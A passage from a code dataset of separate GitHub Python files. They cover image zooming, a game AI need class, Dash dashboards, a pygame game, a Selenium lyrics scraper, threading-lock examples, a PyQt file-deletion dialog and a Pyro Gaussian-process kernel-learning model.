j==0:\n\t\t\ttemp_1 = rows\n\t\telse:\n\t\t\ttemp_1 = np.vstack([temp_1,rows])\n\tfor p in range(0,temp_1.shape[1],factor):\n\t\tcol = temp_1[:,p]\n\t\tcols = repeat_columns(col,factor)\n\t\tif p==0:\n\t\t\ttemp_2 = cols\n\t\telse:\n\t\t\ttemp_2 = np.hstack([temp_2,cols])\n\tcanvas = np.uint8(temp_2)\n\treturn canvas\n\n\nif __name__ == '__main__':\n\tfile_name = \"./images/lena512color.tiff\"\n\timg = cv2.imread(file_name)\n\tgray = 0.299*img[:,:,0] + 0.587*img[:,:,0] + 0.114*img[:,:,0]\n\t# gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\tmodif = image_zooming(gray,3)\n\tplt.imshow(modif)\n\n","repo_name":"vishnusk12/image_zooming","sub_path":"zoom.py","file_name":"zoom.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"29931002234","text":"\"\"\"\nCreated by Kieran Bates\n\nThis class represents a need that an agent has\n\"\"\"\n\n\nclass Need(object):\n def __init__(self, name, value=10.0, warning_point=3.0, decay_at=30, decay_amount=0.5):\n self.value = value\n self.name = name\n self.warning_point = warning_point\n self.decay_at = decay_at\n self.decay_amount = decay_amount\n self.decay_time = 0\n self.max = 10.0\n self.min = 0.0\n self.zero_time = 0\n self.message = \"\"\n\n def update(self, time=0.0, value=0.0):\n \"\"\"updates the current need\"\"\"\n self.decay_time += time\n\n # update the value\n self.value += value\n\n if self.value == 0.0:\n self.zero_time += time\n else:\n self.zero_time = 0\n\n # check if decay time has reached decay at reset decay time and subtract\n # decay amount from the value\n if self.decay_time == self.decay_at:\n self.decay_time = 0\n self.value -= self.decay_amount\n\n # update value if out of bounds to the closest bound\n if self.value < self.min:\n self.value = self.min\n if self.value > self.max:\n self.value = self.max\n\n # check if warning point has been reached and if has set message for retrieval\n if self.value < self.warning_point:\n self.message = \"Agent's \" + self.name + \" needs to be taken care of\"\n else:\n self.message = \"\"\n","repo_name":"kieran100054421/AI_For_Games_Spikes","sub_path":"Spike_13/Spike_13/need.py","file_name":"need.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17335222489","text":"from typing import Any\n\nfrom dash import dcc\n\n\nclass Tab(dcc.Tab):\n \"\"\"A dcc.Tab with styling\n\n Keyword arguments:\n\n - children (a list of or a singular dash component, string or number; required):\n The children of this component.\n\n - style (dict; optional):\n Additional styling\n\n - selected_style (dict; optional):\n Additional styling when the tab is selected\n\n \"\"\"\n\n def __init__(\n self,\n *args: Any,\n **kwargs: Any,\n ) -> None:\n super().__init__(*args, **kwargs)\n self.className = \"webviz-tab\"\n self.selected_className = \"webviz-tab-selected\"\n","repo_name":"equinor/webviz-core-components","sub_path":"webviz_core_components/wrapped_components/tab.py","file_name":"tab.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"67"} +{"seq_id":"19264355993","text":"import pandas as pd\nimport os\nimport datetime\nimport numpy as np\n\n#Cleans data to find first X number of retweets and other personalizable Twitter characteristics\n\nos.chdir('../data/fake4_5/')\n\ndir_list = next(os.walk('.'))[1]\ndf = pd.DataFrame(columns=['Folder', 'Retweet Count', 'Time Difference', 'Estimated Time', 'Total Retweeted', 'Retweeted Followers'])\nnf = pd.DataFrame(columns=['Folder','Retweet Count', 'Time Difference', 'Total Retweeted', 'Retweeted Followers'])\nfor folder in dir_list:\n nodes = pd.read_csv(folder + '/new_node.csv')\n nodes['time'] = pd.to_timedelta(nodes['Time Difference'])\n lastRetweet = nodes['retweeted_status.retweet_count'][len(nodes)-1]\n firstRetweets = [nodes['retweeted_status.retweet_count'][0],nodes['retweeted_status.retweet_count'][1]]\n if firstRetweets[0] == firstRetweets[0]:\n retweet = firstRetweets[0]\n time = nodes['time'][0]\n df = df.append(pd.DataFrame({'Folder': folder, 'Retweet Count': firstRetweets[0], 'Time Difference': nodes['time'][0],\n 'Estimated Time': nodes['time'][0]/firstRetweets[0]/np.timedelta64(1,'s'),'Total Retweeted': lastRetweet, 'Retweeted Followers': nodes['retweeted_status.user.followers_count'][3]}, index=[0]), ignore_index=True)\n else:\n retweet = firstRetweets[1]\n time = nodes['time'][1]\n df = df.append(\n pd.DataFrame({'Folder': folder, 'Retweet Count': firstRetweets[1], 'Time Difference': nodes['time'][1],\n 'Estimated Time': nodes['time'][1] / firstRetweets[1] / np.timedelta64(1, 's'),\n 'Total Retweeted': lastRetweet, 'Retweeted Followers': nodes['retweeted_status.user.followers_count'][3]}, index=[0]), ignore_index=True)\n if retweet <= 2 and time <= datetime.timedelta(seconds=10):\n nf = nf.append(\n pd.DataFrame({'Folder': folder, 'Retweet Count': retweet, 'Time Difference': time,\n 'Total Retweeted': lastRetweet,'Retweeted Followers': nodes['retweeted_status.user.followers_count'][3]}, index=[0]), ignore_index=True)\n nf.to_csv('usableTimes.csv', index=False)\n df.to_csv('allTimes.csv', index=False)\n\n\n\n","repo_name":"cindysi21/misinformationTrump","sub_path":"code/quickRetweet.py","file_name":"quickRetweet.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41289306650","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n# sets the options to a headless browser\n\noptions = Options()\noptions.headless = True\nbrowser = webdriver.Chrome('/users/ethan/Desktop/chromedriver', options=options)\n\n# getting user data and parsing the url\nprint('Please enter the lyrics of a song')\nlyrics = input()\nurl = 'https://findmusicbylyrics.com/search?q=' + lyrics.replace(\" \", \"+\")\n\n# launches headless browser\nbrowser.get(url)\n\n# gets the data based on the class names\nfirst_song = browser.find_element_by_class_name('gs-title')\nsample_lyrics = browser.find_element_by_class_name('gs-snippet')\n\n# prints and formats to remove unnecessary characters\nprint('\\n' + first_song.text.split(\"Lyrics\")[0] + '\\nSample Lyrics:\\n\\n' + sample_lyrics.text.split(': ')[-1])\nbrowser.close()\n","repo_name":"subhyde/find-song-by-lyrics","sub_path":"songfinder.py","file_name":"songfinder.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36344529824","text":"import pygame\nfrom gameObject import GameObject\nfrom player import Player\nfrom enemy import Enemy\n\n\nclass Game:\n\n def __init__(self):\n self.act_player = None\n self.sys_running = True\n self.vid_size = (800, 800)\n self.sys_color_white = (255, 255, 255)\n self.sys_clock_rate = 120\n self.sys_window = pygame.display.set_mode(self.vid_size)\n self.sys_clock = pygame.time.Clock()\n self.tro_enemies = []\n self.var_level = 1\n self.var_reset = False\n\n ast_background = pygame.image.load('assets/background.png')\n self.vid_scale = (self.vid_size[0] / ast_background.get_width(), self.vid_size[1] / ast_background.get_height())\n\n self.obj_background = GameObject(0, 0, self.vid_size[0], self.vid_size[1], 'assets/background.png', None)\n self.obj_treasure = GameObject(382, 114, 14, 12, 'assets/treasure.png', self.vid_scale)\n self.init_actors()\n\n def init_actors(self):\n self.act_player = Player(375, 700, 12, 16, 'assets/player.png', self.vid_scale, 5, 0, 'x')\n self.tro_enemies = [\n Enemy(100, 500, 16, 12, 'assets/enemy.png', self.vid_scale, 5, 1, 'y', 1),\n Enemy(700, 350, 16, 12, 'assets/enemy.png', self.vid_scale, 5, 2, 'y', 3),\n Enemy(100, 200, 16, 12, 'assets/enemy.png', self.vid_scale, 5, 3, 'y', 5),\n ]\n\n def handle_events(self):\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n self.sys_running = False\n elif event.type == pygame.KEYDOWN:\n self.act_player.setDirection(event.key)\n elif event.type == pygame.KEYUP:\n self.act_player.resetDirection()\n\n def control_logic(self):\n self.act_player.move(self.vid_size[0])\n for act_enemy in self.tro_enemies:\n if act_enemy.level <= self.var_level:\n act_enemy.move(self.vid_size[0])\n\n def draw_objects(self):\n # Static Objects\n self.sys_window.fill(self.sys_color_white)\n self.sys_window.blit(self.obj_background.image, (self.obj_background.x, self.obj_background.y))\n self.sys_window.blit(self.obj_treasure.image, (self.obj_treasure.x, self.obj_treasure.y))\n # Moving Objects\n self.sys_window.blit(self.act_player.image, (self.act_player.x, self.act_player.y))\n for act_enemy in self.tro_enemies:\n if act_enemy.level <= self.var_level:\n self.sys_window.blit(act_enemy.image, (act_enemy.x, act_enemy.y))\n pygame.display.update()\n\n @staticmethod\n def detect_collision(object_a, object_b):\n if object_a.y > (object_b.y + object_b.height):\n return False\n elif (object_a.y + object_a.height) < object_b.y:\n return False\n if object_a.x > (object_b.x + object_b.width):\n return False\n elif (object_a.x + object_a.width) < object_b.x:\n return False\n return True\n\n def check_collision(self):\n for act_enemy in self.tro_enemies:\n if (act_enemy.level <= self.var_level) and self.detect_collision(self.act_player, act_enemy):\n self.var_level = 1\n self.var_reset = True\n return\n if self.detect_collision(self.act_player, self.obj_treasure):\n self.var_level += 1\n self.var_reset = True\n return\n\n def reset_board(self):\n if not self.var_reset:\n return\n else:\n self.init_actors()\n return\n\n def run_game_loop(self):\n while self.sys_running:\n self.handle_events()\n self.control_logic()\n self.draw_objects()\n self.check_collision()\n self.reset_board()\n self.var_reset = False\n self.sys_clock.tick(self.sys_clock_rate)\n","repo_name":"camcleod99/pyGame","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25133796182","text":"import numpy as np\r\nimport pandas as pd\r\nimport plotly.graph_objects as go\r\nimport dash\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\nfrom dash.dependencies import Input,Output\r\n\r\n\r\n#python code\r\npatients=pd.read_csv('IndividualDetails.csv')\r\n\r\ntotal=patients.shape[0]\r\nactive=patients[patients['current_status']=='Hospitalized'].shape[0]\r\nrecovered=patients[patients['current_status']=='Recovered'].shape[0]\r\ndeaths=patients[patients['current_status']=='Deceased'].shape[0]\r\n\r\n\r\nmain=pd.read_csv('covid_19_india.csv')\r\nmain['total']=main['ConfirmedIndianNational'] + main['ConfirmedForeignNational']\r\nmain['total']=np.cumsum(main['total'].values)\r\n\r\nage=pd.read_csv('AgeGroupDetails.csv')\r\n\r\noptions=[\r\n {'label':'Hospitalized', 'value':'Hospitalized'},\r\n {'label':'Recovered', 'value':'Recovered'},\r\n {'label': 'Deceased', 'value':'Deceased'}\r\n]\r\n\r\n# external CSS stylesheets\r\nexternal_stylesheets = [\r\n {\r\n 'href': 'https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',\r\n 'rel': 'stylesheet',\r\n 'integrity': 'sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO',\r\n 'crossorigin': 'anonymous'\r\n }\r\n]\r\n\r\napp=dash.Dash(__name__,external_stylesheets=external_stylesheets)\r\nserver = app.server\r\n\r\napp.layout=html.H1('hello world welcome to python')\r\n\r\napp.layout=html.Div(children=[\r\n html.H1(\"India's Covid 19 Dashboard\",style={'color':'#fff','text-align':'center','backgroundColor':'blue'}),\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([html.H3(\"Total Cases\", className=\"text-white\"),\r\n html.H4(total,className=\"text-white\")\r\n ],className=\"card-body\")\r\n ],className=\"card bg-danger\")\r\n ],className=\"col-md-3\"),\r\n\r\n html.Div([html.Div([\r\n html.Div([html.H3(\"Active Cases\", className=\"text-white\"),\r\n html.H4(active,className=\"text-white\")\r\n ],className=\"card-body\")\r\n ],className=\"card bg-info\")\r\n ],className='col-md-3'),\r\n\r\n html.Div([html.Div([\r\n html.Div([html.H3(\"Recovered\", className=\"text-white\"),\r\n html.H4(recovered,className=\"text-white\")\r\n ],className=\"card-body\")\r\n ],className=\"card bg-success\")\r\n ],className='col-md-3'),\r\n\r\n html.Div([html.Div([\r\n html.Div([html.H3(\"Deaths\", className=\"text-white\"),\r\n html.H4(deaths,className=\"text-white\")\r\n ],className=\"card-body\")\r\n ],className=\"card bg-warning\")\r\n ],className='col-md-3'),\r\n\r\n ],className='row'),\r\n\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([dcc.Graph(id='line plot',figure={'data':[go.Scatter(x=main['Date'],y=main['total'],mode='lines')],\r\n 'layout':go.Layout(title='Day By Day Analysis',xaxis={'title':'Date'},yaxis={'title':'number of cased'})})\r\n ],className='card-body')\r\n ],className='card')\r\n ],className='col-md-8'),\r\n\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Graph(id='pie', figure={'data': [go.Pie(labels=age['AgeGroup'], values=age['TotalCases'])],\r\n 'layout': go.Layout(title='Age Distrubution')})],className='card-body')\r\n ],className='card')\r\n ],className='col-md-4')\r\n ],className='row' ,style={'margin-top':'50px'}),\r\n\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n html.Div([\r\n dcc.Dropdown(id='picker',options=options,value='All'),\r\n dcc.Graph(id='bar')\r\n ],className='card-body')\r\n ],className='card')\r\n ],className='col-md-12')\r\n ],className='row',style={'margin-top':'50px'})\r\n],className='container')\r\n\r\n@app.callback(Output('bar','figure'),[Input('picker','value')])\r\ndef update_graph(type):\r\n if type=='All':\r\n pbar = patients.groupby('detected_state').count()['id'].reset_index()\r\n\r\n else:\r\n new = patients[patients['current_status'] == type]\r\n pbar = new.groupby('detected_state').count()['id'].reset_index()\r\n\r\n return {'data': [go.Bar(x=pbar['detected_state'], y=pbar['id'])],\r\n 'layout': go.Layout(title='State Wise Total Cases')}\r\n\r\n\r\nif __name__=='__main__':\r\n app.run_server(debug=True)","repo_name":"rrpatil-1/Covid-Dashboard","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43327573519","text":"###########\n# Imports #\n###########\n\nimport unittest\n\n\n###################\n# Testing Library #\n###################\nfrom Project_Euler.problem_sets.problem_8 import split_number_to_list, create_list_sets, get_highest_value, \\\n multiply_item_in_list\n\n\nclass TestProjectEuler(unittest.TestCase):\n def test_split_number_to_list(self):\n n = 2345\n expected_res = [2,3,4,5]\n res = split_number_to_list(object)\n\n self.assertEqual(expected_res, res)\n\n def test_create_list_sets(self):\n lst = [2,3,4,5]\n n = 3\n expected_res = [[2,3,4],[3,4,5]]\n res = create_list_sets(lst, n)\n\n self.assertEqual(expected_res, res)\n\n def test_multiply_item_in_list(self):\n lst = [2, 3, 4, 5]\n expected_res = 120\n res = multiply_item_in_list(lst)\n\n self.assertEqual(expected_res, res)\n\n\n##################\n# Test Functions #\n##################\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"LeftysWorld/Python_Tools","sub_path":"Project_Euler/test/problem_sets/problem_8.py","file_name":"problem_8.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"29993577082","text":"\"\"\"\n 多线程与多进程最大的不同在于:\n 多进程中,同一变量,各有一分拷贝存在于每个进程中,互补应吸纳该\n 多线程中,所有变量由所有线程共享,任何一个变量都可以被任何一个线程修改\n\"\"\"\nimport time,threading\nbalance = 0\n\n\ndef change_it(n):\n # 先存后取,结果应该为0\n global balance\n balance = balance + n\n balance = balance - n\n\n\ndef run_thread(n):\n for i in range(100000): # 保证执行次数够多\n change_it(n)\n\n\n\n\"\"\"\n 修改balance需要多条语句,而执行这几条语句时,线程可能中断\n 初始值 balance = 0\n\nt1: x1 = balance + 5 # x1 = 0 + 5 = 5\n\nt2: x2 = balance + 8 # x2 = 0 + 8 = 8\nt2: balance = x2 # balance = 8\n\nt1: balance = x1 # balance = 5\nt1: x1 = balance - 5 # x1 = 5 - 5 = 0\nt1: balance = x1 # balance = 0\n\nt2: x2 = balance - 8 # x2 = 0 - 8 = -8\nt2: balance = x2 # balance = -8\n\n结果 balance = -8\n\"\"\"\n# 给change_it()上锁,保证一个线程修改变量之后其他线程才能访问该变量\nlock = threading.Lock()\n\ndef run_thread1(n):\n for i in range(10000):\n # 先要获得锁\n lock.acquire()\n try:\n change_it(n)\n finally:\n # 改完了一定要释放锁\n lock.release()\n\nt1 = threading.Thread(target=run_thread, args=(5,))\nt2 = threading.Thread(target=run_thread, args=(8,))\nt1.start()\nt2.start()\nt1.join()\nt2.join()\nprint(balance)\n\n\"\"\"\n Python的线程是真正的线程,但解释器执行代码时,\n 有一个GIL锁:Global Interpreter Lock,任何Python线程执行前,必须先获得GIL锁,\n 然后,每执行100条字节码,解释器就自动释放GIL锁,让别的线程有机会执行。\n 这个GIL全局锁实际上把所有线程的执行代码都给上了锁,\n 所以,多线程在Python中只能交替执行,即使100个线程跑在100核CPU上,也只能用到1个核。\n 执行与cpu核数相同的死循环也只能跑满一个核,\n 而其他语言比如C\\C++或Java能把全部核心跑满\n\ndef deadloop(x):\n while True:\n x = x ^ 1\n\nt1 = threading.Thread(target=deadloop, args=(5,))\nt2 = threading.Thread(target=deadloop, args=(6,))\nt3 = threading.Thread(target=deadloop, args=(9,))\nt4 = threading.Thread(target=deadloop, args=(4,))\nt1.start()\nt2.start()\nt3.start()\nt4.start()\nt1.join()\nt2.join()\nt3.join()\nt4.join()\n\n\nPython解释器由于设计时有GIL全局锁,导致了多线程无法利用多核。\n多线程的并发在Python中就是一个美丽的梦\n但多进程可以使用多核\n\"\"\"","repo_name":"Philex5/Python-Learn","sub_path":"Python-learn/9.Process&Thread/7.Lock.py","file_name":"7.Lock.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18230946830","text":"#-*- coding: utf-8-*-\n__author__ = 'Aaron'\nimport sys\nimport os\nfrom PyQt4 import QtGui\nfrom delf import Ui_delform\n\nclass delf(QtGui.QDialog,Ui_delform):\n def __init__(self,parent =None):\n super(delf, self).__init__(parent)\n self.setupUi(self)\n self.show()\n self.start()\n self.finebtn.clicked.connect(self.finish)\n iconop = QtGui.QIcon()\n iconop.addPixmap(QtGui.QPixmap(\"icons/delete.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.delbtn.setIcon(iconop)\n\n\n def finish(self):\n QtGui.QMessageBox.information(None, u\"成功\",\n u\"名單刪除成功,\\n請重新啟動程式\",\n QtGui.QMessageBox.Ok | QtGui.QMessageBox.Default,\n QtGui.QMessageBox.NoButton)\n\n self.close()\n\n def start(self):\n model = QtGui.QStandardItemModel(self.listView)\n cwd = os.getcwdu()\n # print cwd\n self.storelocation = os.path.join(cwd,\"namelist\")\n fs = os.listdir(self.storelocation)\n for f in fs:\n item = QtGui.QStandardItem(f)\n model.appendRow(item)\n self.listView.setModel(model)\n self.delbtn.clicked.connect(self.delaction)\n\n def delaction(self):\n for index in self.listView.selectedIndexes():\n a = unicode(index.data().toString())\n import os\n rmf = os.path.join(self.storelocation,a)\n os.remove(rmf)\n self.start()\n\n\n\n\nif __name__ ==\"__main__\":\n app = QtGui.QApplication(sys.argv)\n window = delf()\n sys.exit(app.exec_())","repo_name":"wlhunag/Random_pick","sub_path":"Delname.py","file_name":"Delname.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26031938695","text":"import torch\nimport pyro\nimport pyro.distributions as dist\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport logging\nimport pyro.contrib.gp as gp\n\nfrom torch.distributions import biject_to\n\nfrom .abstract_model import AbstractModel\nfrom .pyro_extensions.guides import AutoSLPNormalReparamGuide\n\n\nclass GPKernelLearning(AbstractModel):\n does_lppd_evaluation = True\n slps_identified_by_discrete_samples = True\n\n input_dim = 1\n\n def __init__(self, data_path, jitter=1e-6):\n self.X, self.y, self.X_val, self.y_val = self.load_data(data_path)\n\n self.jitter = jitter\n\n @staticmethod\n def load_data(data_path):\n data = torch.tensor(np.loadtxt(data_path, delimiter=\",\"))\n xs = data[:, 0]\n ys = data[:, 1]\n xs -= xs.min()\n xs /= xs.max()\n ys -= ys.mean()\n ys *= 4 / (ys.max() - ys.min())\n\n # Keep 10 % of data for validation.\n val_ix = round(xs.size(0) * 0.9)\n xs, xs_val = xs[:val_ix], xs[val_ix:]\n ys, ys_val = ys[:val_ix], ys[val_ix:]\n\n return xs, ys, xs_val, ys_val\n\n def sample_kernel_fn(self, address_prefix: str) -> gp.kernels.Kernel:\n kernel_type = pyro.sample(\n f\"{address_prefix}kernel_type\",\n dist.Categorical(torch.tensor([0.2, 0.2, 0.2, 0.2, 0.1, 0.1])),\n infer={\"branching\": True},\n )\n\n if kernel_type == 0.0:\n # Rational Quadratic kernel\n rq_kernel = gp.kernels.RationalQuadratic(\n input_dim=self.input_dim,\n )\n rq_kernel.lengthscale = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n rq_kernel.scale_mixture = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n return rq_kernel\n elif kernel_type == 1.0:\n # Linear kernel\n linear_kernel = gp.kernels.Polynomial(input_dim=self.input_dim, degree=1)\n linear_kernel.bias = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n return linear_kernel\n elif kernel_type == 2.0:\n # Squared Exponential kernel\n rbf_kernel = gp.kernels.RBF(\n input_dim=self.input_dim,\n )\n rbf_kernel.lengthscale = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n return rbf_kernel\n elif kernel_type == 3.0:\n # Periodic\n periodic_kernel = gp.kernels.Periodic(\n input_dim=self.input_dim,\n variance=torch.tensor(1.0),\n )\n periodic_kernel.lengthscale = pyro.nn.PyroSample(\n dist.InverseGamma(2.0, 1.0)\n )\n periodic_kernel.period = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n return periodic_kernel\n elif kernel_type == 4.0:\n # Sum\n left_child = self.sample_kernel_fn(f\"{address_prefix}sum_left_\")\n right_child = self.sample_kernel_fn(f\"{address_prefix}sum_right_\")\n return gp.kernels.Sum(left_child, right_child)\n elif kernel_type == 5.0:\n # Product\n left_child = self.sample_kernel_fn(f\"{address_prefix}times_left_\")\n right_child = self.sample_kernel_fn(f\"{address_prefix}times_right_\")\n return gp.kernels.Product(left_child, right_child)\n else:\n raise ValueError(f\"Unkown kernel type: {kernel_type}\")\n\n def __call__(self):\n # Sample kernel function\n kernel_fn = self.sample_kernel_fn(\"\")\n\n std = pyro.sample(\"std\", dist.HalfNormal(1))\n\n # Create covariance matrix\n N = self.X.size(0)\n Kff = kernel_fn(self.X)\n # The constant kernel has problems because it uses .expand() internally.\n # To avoid the problem we need to clone the covariance matrix.\n Kff = Kff.type(self.X.dtype).clone()\n Kff.view(-1)[:: N + 1] += self.jitter + torch.pow(\n std, 2\n ) # add noise to diagonal\n Lff = torch.linalg.cholesky(Kff)\n\n zero_loc = self.X.new_zeros(N)\n pyro.sample(\"y\", dist.MultivariateNormal(zero_loc, scale_tril=Lff), obs=self.y)\n\n # Sample data from standard normal\n return kernel_fn\n\n def make_parameter_plots(self, results, guide, branching_trace, file_prefix):\n if isinstance(guide, AutoSLPNormalReparamGuide):\n means = results[\"loc\"]\n scale = [np.exp(v) for v in results[\"log_scale\"]]\n else:\n logging.info(f\"Parameter plotting for guide {guide} not supported.\")\n return\n\n means = [\n [(site, v) for site, v in guide._unpack_latent(torch.tensor(cm))]\n for cm in means\n ]\n scale = [\n [(site, v) for site, v in guide._unpack_latent(torch.tensor(cs))]\n for cs in scale\n ]\n num_params = len(means[-1])\n\n # Plot final distributions\n fig, axs = plt.subplots(num_params, 1, figsize=(10, 4 * num_params))\n for ix in range(num_params):\n site = means[-1][ix][0]\n transform = biject_to(site[\"fn\"].support)\n\n mean, std = means[-1][ix][1], scale[-1][ix][1]\n q_dist = dist.Normal(mean, std)\n xs = torch.linspace(mean - 3 * std, mean + 3 * std, 100)\n constrained_xs = transform(xs)\n log_densities = q_dist.log_prob(xs) + transform.inv.log_abs_det_jacobian(\n constrained_xs, xs\n )\n axs[ix].plot(constrained_xs, log_densities.exp())\n axs[ix].set_title(site[\"name\"])\n\n fig.tight_layout()\n fig.savefig(f\"{file_prefix}_final_marginals.jpg\")\n\n # Plot evolution of the means\n fig, axs = plt.subplots(num_params, 1, figsize=(10, 4 * num_params))\n for ix in range(num_params):\n site = means[0][ix][0]\n transform = biject_to(site[\"fn\"].support)\n\n param_means = torch.tensor([x[ix][1] for x in means])\n constrained_param_means = transform(param_means)\n axs[ix].plot(constrained_param_means)\n axs[ix].set_title(f\"{site['name']} mean\")\n axs[ix].set_xlabel(\"Iteration\")\n axs[ix].set_ylabel(\"Value\")\n\n fig.tight_layout()\n fig.savefig(f\"{file_prefix}_params.jpg\")\n plt.close(\"all\")\n\n def evaluation(self, posterior_samples, ground_truth_weights=None):\n post_kernels = self.extract_posterior_kernels(posterior_samples)\n noises = [trace.nodes[\"std\"][\"value\"] for trace in posterior_samples]\n\n log_p = torch.tensor(0.0)\n for kernel_fn, noise in zip(post_kernels, noises):\n gp_mean, gp_cov = self.gp_analytic_posterior(\n kernel_fn, self.X, self.X_val, self.y, noise, self.jitter, full_cov=True\n )\n log_p += (\n dist.MultivariateNormal(gp_mean, gp_cov).log_prob(self.y_val).detach()\n )\n\n return log_p / len(posterior_samples)\n\n def plot_posterior_samples(self, posterior_samples, fname):\n post_kernels = self.extract_posterior_kernels(posterior_samples)\n noises = [trace.nodes[\"std\"][\"value\"] for trace in posterior_samples]\n\n new_xs = torch.linspace(0, 1, 500)\n posterior_fs = torch.zeros((len(post_kernels), new_xs.size(0)))\n gp_means = torch.zeros((len(post_kernels), new_xs.size(0)))\n gp_vars = torch.zeros((len(post_kernels), new_xs.size(0)))\n for ix in range(len(post_kernels)):\n with torch.no_grad():\n gp_post_mean, gp_post_cov = self.gp_analytic_posterior(\n post_kernels[ix],\n self.X,\n new_xs,\n self.y,\n noises[ix],\n self.jitter,\n full_cov=True,\n )\n posterior_fs[ix, :] = (\n dist.MultivariateNormal(gp_post_mean, gp_post_cov).sample().detach()\n )\n\n f_post_mean = posterior_fs.mean(dim=0)\n f_post_std = posterior_fs.std(dim=0)\n\n fig, ax = plt.subplots(figsize=(15, 10))\n ax.plot(new_xs, f_post_mean, label=\"Post mean\", color=\"red\")\n ax.fill_between(\n new_xs,\n f_post_mean - 2 * f_post_std,\n f_post_mean + 2 * f_post_std,\n color=\"red\",\n alpha=0.2,\n )\n num_samples_to_plot = min(5, len(post_kernels))\n for ix in range(num_samples_to_plot):\n ax.plot(new_xs, posterior_fs[ix, :], color=\"green\", alpha=0.3)\n\n ax.scatter(self.X, self.y, label=\"Data\", color=\"black\")\n ax.scatter(self.X_val, self.y_val, label=\"Held-out data\")\n ax.set_xlim((-0.01, 1.01))\n ax.legend(loc=\"upper left\")\n fig.savefig(fname)\n plt.close(\"all\")\n\n @staticmethod\n def extract_posterior_kernels(posterior_samples):\n post_kernels = [trace.nodes[\"_RETURN\"][\"value\"] for trace in posterior_samples]\n for ix in range(len(post_kernels)):\n for name, s in posterior_samples[ix].iter_stochastic_nodes():\n if name in [\"std\", \"y\"] or \"kernel_type\" in name:\n continue\n\n if isinstance(post_kernels[ix], gp.kernels.Sum) or isinstance(\n post_kernels[ix], gp.kernels.Product\n ):\n names = name.split(\".\")\n kern_mod = post_kernels[ix]._modules[names[0]]\n for jx in range(len(names) - 2):\n kern_mod = kern_mod._modules[names[jx + 1]]\n setattr(kern_mod, names[-1], s[\"value\"])\n else:\n setattr(post_kernels[ix], name, s[\"value\"])\n return post_kernels\n\n @staticmethod\n def gp_analytic_posterior(\n kernel_fn: gp.kernels.Kernel,\n X: torch.tensor,\n new_xs: torch.tensor,\n y: torch.tensor,\n noise: torch.tensor,\n jitter: float,\n full_cov: bool = False,\n ):\n N = X.size(0)\n Kff = kernel_fn(X).contiguous()\n Kff = Kff.type(X.dtype).clone()\n Kff.view(-1)[:: N + 1] += jitter + torch.pow(noise, 2)\n Lff = torch.linalg.cholesky(Kff)\n\n gp_post_mean, gp_post_cov = gp.util.conditional(\n new_xs, X, kernel_fn, y, Lff=Lff, jitter=jitter, full_cov=full_cov\n )\n if full_cov:\n M = new_xs.size(0)\n gp_post_cov = gp_post_cov.contiguous()\n gp_post_cov.view(-1, M * M)[:, :: M + 1] += torch.pow(noise, 2)\n else:\n gp_post_cov = gp_post_cov + torch.pow(noise, 2)\n return gp_post_mean, gp_post_cov","repo_name":"treigerm/sdvi_neurips","sub_path":"models/gp_kernel_learning.py","file_name":"gp_kernel_learning.py","file_ext":"py","file_size_in_byte":10578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31611851418","text":"from __future__ import absolute_import\n# encoding: UTF-8\n__author__ = 'xepa4ep'\n\nimport os\nimport re\nfrom json import dumps\nfrom flask import request\nfrom tml.config import CONFIG\nfrom . import translator\nfrom .tml_cookies import TmlCookieHandler\n\n\npj = os.path.join\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\nclass Tml(object):\n\n app = None\n _default_locale = None\n _config = None\n\n\n def __init__(self, app=None, default_locale='en', configure_jinja=True):\n self._default_locale = default_locale\n self._configure_jinja = configure_jinja\n self.app = app\n self.__before_response = set()\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Set up this instance for use with *app*, if no app was passed to\n the constructor.\n \"\"\"\n self.app = app\n app.tml_instance = self\n if not 